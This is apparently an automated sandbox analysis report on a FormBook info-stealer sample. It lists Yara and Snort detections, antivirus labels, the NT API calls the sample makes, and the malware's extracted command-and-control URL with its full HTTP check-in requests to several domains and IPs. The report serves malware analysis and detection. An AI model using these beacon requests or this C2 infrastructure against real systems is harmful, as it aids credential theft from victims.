Source: Yara match	File source: 00000001.00000002.230049818.00000000021A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.273287950.0000000006399000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.486466512.0000000000430000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.487707401.0000000004060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.487516890.0000000002A10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.283872070.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.284026050.0000000000540000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000001.227451103.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.284250937.00000000009D0000.00000040.00000001.sdmp, type: MEMORY

Machine Learning detection for sample

Show sources

Source: wREFu91LXZ.exe

Joe Sandbox ML: detected

Source: 10.2.msiexec.exe.48c7960.5.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.2.msiexec.exe.22b358.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 1.2.wREFu91LXZ.exe.21a0000.2.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.2.wREFu91LXZ.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.1.wREFu91LXZ.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.wREFu91LXZ.exe.680000.1.unpack	Avira: Label: TR/Patched.Ren.Gen

Source: wREFu91LXZ.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source:	Binary string: msiexec.pdb source: wREFu91LXZ.exe, 00000003.00000002.284421615.0000000000A40000.00000040.00000001.sdmp
Source:	Binary string: msiexec.pdbGCTL source: wREFu91LXZ.exe, 00000003.00000002.284421615.0000000000A40000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: wREFu91LXZ.exe, 00000001.00000003.226799711.0000000002330000.00000004.00000001.sdmp, wREFu91LXZ.exe, 00000003.00000002.284645298.0000000000C2F000.00000040.00000001.sdmp, msiexec.exe, 0000000A.00000002.487880611.0000000004390000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: wREFu91LXZ.exe, msiexec.exe

Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 4x nop then pop esi	3_2_00415852
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 4x nop then pop ebx	3_2_00406A98
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 4x nop then pop edi	3_2_00415699
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then pop ebx	10_2_02A16A99
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then pop esi	10_2_02A25852
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then pop edi	10_2_02A25699

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49737 -> 52.5.43.61:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49737 -> 52.5.43.61:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49737 -> 52.5.43.61:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49739 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49739 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49739 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49741 -> 50.87.238.189:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49741 -> 50.87.238.189:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49741 -> 50.87.238.189:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49743 -> 50.87.248.20:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49743 -> 50.87.248.20:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49743 -> 50.87.248.20:80

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.extinctionbrews.com/dy8g/

Source: global traffic	HTTP traffic detected: GET /dy8g/?9rrLUp1=0Hs+m/QFKKZkFwACjLHyI7vfWqidr4y2jXRg5Hngc5JW+skIzqaHxis+6ShLP6A0B+d4&sxlxj=RL30W HTTP/1.1Host: www.chaneabond.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dy8g/?9rrLUp1=qBaU/+yfeYHlIZouGPofXU4iidVfFInHYvrLlGgOmZTTl18u/I/MgAYEWpA7pfREgQYT&sxlxj=RL30W HTTP/1.1Host: www.melodezu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dy8g/?9rrLUp1=sC7FhjJqcCFIEoUuEobIBnrRYwOZzG9nc/x6jFk5Keq5TgsKgOpKFfaz6JoBJPzzv7cu&sxlxj=RL30W HTTP/1.1Host: www.cajunseafoodstcloud.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dy8g/?9rrLUp1=DjnY/S7/G1yk/GGdjnbMG0pwlAlipgBY8a8MDSEvYTAaE8/8s3MkSQswoFjnAjbDmWUu&sxlxj=RL30W HTTP/1.1Host: www.extinctionbrews.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dy8g/?9rrLUp1=iVPDfBhYBy5JvywJlu7/jTaNaIK/WCHUrbFXeojMH/nMVdHPbpxjQuq5aGN6jhO1pTuT&sxlxj=RL30W HTTP/1.1Host: www.tinsley.websiteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dy8g/?9rrLUp1=XQ+IsuOG6xtA2RDWfBD5IRfVZekOdoA9gy19PVXp7eWYHk3qJ48ISdkxrcmrsJaPDNZD&sxlxj=RL30W HTTP/1.1Host: www.surivaganza.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dy8g/?9rrLUp1=dI9eO6GEnVuhhF2IZBGZI9CJMc/scmM0Fs5NmUifzPq1VUdHCmcaYQjC6cJJVTF2eMwa&sxlxj=RL30W HTTP/1.1Host: www.matcitekids.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 198.185.159.144 198.185.159.144

Source: Joe Sandbox View

ASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE

Source: global traffic	HTTP traffic detected: GET /dy8g/?9rrLUp1=0Hs+m/QFKKZkFwACjLHyI7vfWqidr4y2jXRg5Hngc5JW+skIzqaHxis+6ShLP6A0B+d4&sxlxj=RL30W HTTP/1.1Host: www.chaneabond.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dy8g/?9rrLUp1=qBaU/+yfeYHlIZouGPofXU4iidVfFInHYvrLlGgOmZTTl18u/I/MgAYEWpA7pfREgQYT&sxlxj=RL30W HTTP/1.1Host: www.melodezu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dy8g/?9rrLUp1=sC7FhjJqcCFIEoUuEobIBnrRYwOZzG9nc/x6jFk5Keq5TgsKgOpKFfaz6JoBJPzzv7cu&sxlxj=RL30W HTTP/1.1Host: www.cajunseafoodstcloud.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dy8g/?9rrLUp1=DjnY/S7/G1yk/GGdjnbMG0pwlAlipgBY8a8MDSEvYTAaE8/8s3MkSQswoFjnAjbDmWUu&sxlxj=RL30W HTTP/1.1Host: www.extinctionbrews.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dy8g/?9rrLUp1=iVPDfBhYBy5JvywJlu7/jTaNaIK/WCHUrbFXeojMH/nMVdHPbpxjQuq5aGN6jhO1pTuT&sxlxj=RL30W HTTP/1.1Host: www.tinsley.websiteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dy8g/?9rrLUp1=XQ+IsuOG6xtA2RDWfBD5IRfVZekOdoA9gy19PVXp7eWYHk3qJ48ISdkxrcmrsJaPDNZD&sxlxj=RL30W HTTP/1.1Host: www.surivaganza.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dy8g/?9rrLUp1=dI9eO6GEnVuhhF2IZBGZI9CJMc/scmM0Fs5NmUifzPq1VUdHCmcaYQjC6cJJVTF2eMwa&sxlxj=RL30W HTTP/1.1Host: www.matcitekids.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.chaneabond.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 22 Jul 2021 08:09:41 GMTServer: Apache/2.4.18 (Ubuntu)Content-Length: 278Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6d 65 6c 6f 64 65 7a 75 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at www.melodezu.com Port 80</address></body></html>

Source: explorer.exe, 00000005.00000000.248833107.0000000008A3A000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 3.1.wREFu91LXZ.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.wREFu91LXZ.exe.21a0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.wREFu91LXZ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.1.wREFu91LXZ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.wREFu91LXZ.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.wREFu91LXZ.exe.21a0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.230049818.00000000021A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.273287950.0000000006399000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.486466512.0000000000430000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.487707401.0000000004060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.487516890.0000000002A10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.283872070.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.284026050.0000000000540000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000001.227451103.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.284250937.00000000009D0000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 3.1.wREFu91LXZ.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.1.wREFu91LXZ.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.wREFu91LXZ.exe.21a0000.2.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.wREFu91LXZ.exe.21a0000.2.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.wREFu91LXZ.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.wREFu91LXZ.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.1.wREFu91LXZ.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.1.wREFu91LXZ.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.wREFu91LXZ.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.wREFu91LXZ.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.wREFu91LXZ.exe.21a0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.wREFu91LXZ.exe.21a0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.230049818.00000000021A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.230049818.00000000021A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.273287950.0000000006399000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.273287950.0000000006399000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.486466512.0000000000430000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.486466512.0000000000430000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.487707401.0000000004060000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.487707401.0000000004060000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.487516890.0000000002A10000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.487516890.0000000002A10000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.283872070.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.283872070.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.284026050.0000000000540000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.284026050.0000000000540000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000001.227451103.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000001.227451103.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.284250937.00000000009D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.284250937.00000000009D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 3_2_004181D0 NtCreateFile,	3_2_004181D0
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 3_2_00418280 NtReadFile,	3_2_00418280
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 3_2_00418300 NtClose,	3_2_00418300
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 3_2_004183B0 NtAllocateVirtualMemory,	3_2_004183B0
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 3_2_00418222 NtCreateFile,	3_2_00418222
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 3_2_004183AA NtAllocateVirtualMemory,	3_2_004183AA
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 3_2_00B798F0 NtReadVirtualMemory,LdrInitializeThunk,	3_2_00B798F0
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 3_2_00B79860 NtQuerySystemInformation,LdrInitializeThunk,	3_2_00B79860
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 3_2_00B79840 NtDelayExecution,LdrInitializeThunk,	3_2_00B79840
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 3_2_00B799A0 NtCreateSection,LdrInitializeThunk,	3_2_00B799A0
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 3_2_00B79910 NtAdjustPrivilegesToken,LdrInitializeThunk,	3_2_00B79910
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 3_2_00B79A20 NtResumeThread,LdrInitializeThunk,	3_2_00B79A20
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 3_2_00B79A00 NtProtectVirtualMemory,LdrInitializeThunk,	3_2_00B79A00
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 3_2_00B79A50 NtCreateFile,LdrInitializeThunk,	3_2_00B79A50
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 3_2_00B795D0 NtClose,LdrInitializeThunk,	3_2_00B795D0
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 3_2_00B79540 NtReadFile,LdrInitializeThunk,	3_2_00B79540
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 3_2_00B796E0 NtFreeVirtualMemory,LdrInitializeThunk,	3_2_00B796E0
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 3_2_00B79660 NtAllocateVirtualMemory,LdrInitializeThunk,	3_2_00B79660
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 3_2_00B797A0 NtUnmapViewOfSection,LdrInitializeThunk,	3_2_00B797A0
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 3_2_00B79780 NtMapViewOfSection,LdrInitializeThunk,	3_2_00B79780
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 3_2_00B79FE0 NtCreateMutant,LdrInitializeThunk,	3_2_00B79FE0
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 3_2_00B79710 NtQueryInformationToken,LdrInitializeThunk,	3_2_00B79710
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 3_2_00B798A0 NtWriteVirtualMemory,	3_2_00B798A0
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 3_2_00B79820 NtEnumerateKey,	3_2_00B79820
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 3_2_00B7B040 NtSuspendThread,	3_2_00B7B040
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 3_2_00B799D0 NtCreateProcessEx,	3_2_00B799D0
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 3_2_00B79950 NtQueueApcThread,	3_2_00B79950
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 3_2_00B79A80 NtOpenDirectoryObject,	3_2_00B79A80
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 3_2_00B79A10 NtQuerySection,	3_2_00B79A10
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 3_2_00B7A3B0 NtGetContextThread,	3_2_00B7A3B0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043F9860 NtQuerySystemInformation,LdrInitializeThunk,	10_2_043F9860
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043F9840 NtDelayExecution,LdrInitializeThunk,	10_2_043F9840
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	10_2_043F9910
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043F9540 NtReadFile,LdrInitializeThunk,	10_2_043F9540
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043F99A0 NtCreateSection,LdrInitializeThunk,	10_2_043F99A0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043F95D0 NtClose,LdrInitializeThunk,	10_2_043F95D0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043F9660 NtAllocateVirtualMemory,LdrInitializeThunk,	10_2_043F9660
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043F9A50 NtCreateFile,LdrInitializeThunk,	10_2_043F9A50
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043F9650 NtQueryValueKey,LdrInitializeThunk,	10_2_043F9650
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043F96E0 NtFreeVirtualMemory,LdrInitializeThunk,	10_2_043F96E0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043F96D0 NtCreateKey,LdrInitializeThunk,	10_2_043F96D0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043F9710 NtQueryInformationToken,LdrInitializeThunk,	10_2_043F9710
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043F9780 NtMapViewOfSection,LdrInitializeThunk,	10_2_043F9780
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043F9FE0 NtCreateMutant,LdrInitializeThunk,	10_2_043F9FE0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043F9820 NtEnumerateKey,	10_2_043F9820
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043FB040 NtSuspendThread,	10_2_043FB040
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043F98A0 NtWriteVirtualMemory,	10_2_043F98A0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043F98F0 NtReadVirtualMemory,	10_2_043F98F0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043FAD30 NtSetContextThread,	10_2_043FAD30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043F9520 NtWaitForSingleObject,	10_2_043F9520
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043F9560 NtWriteFile,	10_2_043F9560
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043F9950 NtQueueApcThread,	10_2_043F9950
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043F95F0 NtQueryInformationFile,	10_2_043F95F0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043F99D0 NtCreateProcessEx,	10_2_043F99D0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043F9A20 NtResumeThread,	10_2_043F9A20
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043F9610 NtEnumerateValueKey,	10_2_043F9610
